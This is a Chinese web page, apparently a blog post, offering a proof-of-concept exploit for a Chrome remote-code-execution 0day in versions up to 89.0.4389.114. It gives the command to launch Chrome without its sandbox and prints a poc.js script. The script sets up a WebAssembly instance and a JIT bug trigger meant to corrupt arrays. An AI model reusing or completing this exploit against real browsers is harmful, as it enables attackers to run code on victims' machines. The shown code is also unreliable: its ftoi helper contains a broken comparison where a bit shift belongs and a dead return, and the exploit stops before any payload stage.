Chrome浏览器代码执行0day漏洞
Chrome浏览器代码执行0day漏洞POC
适用版本
漏洞危害:远程代码执行
影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114)
测试版本: 89.0.4389.114
测试需求:关闭沙箱环境
[scode type=”share”]目前已泄露的exp需关闭沙箱环境才可执行[/scode]
“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --test-type --no-sandbox
利用方式
引入poc.js
POC
poc.js
相关代码
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) > 32n);
return f64_buf[0];
}
const _arr = new Uint32Array([2**31]);
function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;
x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);
x -= 1;
if(x==-1) x = 0;
var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}
© 版权声明
THE END
- 最新
- 最热
只看作者